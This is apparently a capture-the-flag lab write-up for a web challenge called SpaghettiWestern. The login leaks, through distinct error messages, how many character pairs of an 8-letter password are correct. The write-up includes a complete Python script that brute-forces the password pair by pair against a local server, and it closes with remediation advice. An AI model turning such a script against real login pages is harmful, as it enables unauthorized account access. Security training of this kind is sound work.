Vulnerability analysis The SpaghettiWestern application releases automatically the flag if the user knows (or guesses) an 8-long password of lower-case characters. The input field is not SQL-injectable, and the password is too long to be bruteforcable. However, the website returns different messages depending on how many chair pairs did the user guess. This greatly simplifies the brutefocing, since the attacker can guess a chair pair at a time. Exploiting this vulnerability requires scripting. Exploitation #!python3 import requests import string protocol = "http" domain = "127.0.0.1" port = "80" page_name = "/index.php" msg1 = "Still wrong password, but hey! don't try jokes. Bambino's looking at you." msg2 = "Still wrong password, but now I'm getting angry. STOP RIGHT NOW!" msg3 = "SLAP! Still wrong password! These brothers follow the rule \"an eye for an eye, a tooth for a tooth\"." msg4 = "So are you! The right hand of the devil!" url = protocol + "://" + domain + ":" + port + page_name print("Guessing password...") guessed_part = "" char_list = string.ascii_lowercase for pair_no in list(range(1, 5)): guessed = False for char1 in char_list: print(char1+"*") for char2 in char_list: password = guessed_part + char1 + char2 payload = {"password": password} response = requests.post(url, data=payload) if response.status_code != requests.codes.ok: exit("Status code not OK") if (pair_no == 1 and msg1 in response.text) or (pair_no == 2 and msg2 in response.text) or (pair_no == 3 and msg3 in response.text) or (pair_no == 4 and msg4 in response.text): guessed = True guessed_part = guessed_part + char1 + char2 print("Guessed pair: " + char1 + char2) break if guessed: break if not guessed: exit("Exhaustive search gave no results") print() print("Done.") print("Complete password: " + password) Remediation The log-in mechanism should not give informative messages about how many characters of the password did the user guess. Also, the response time should not depend on it, to avoid time-based bruteforcing attacks.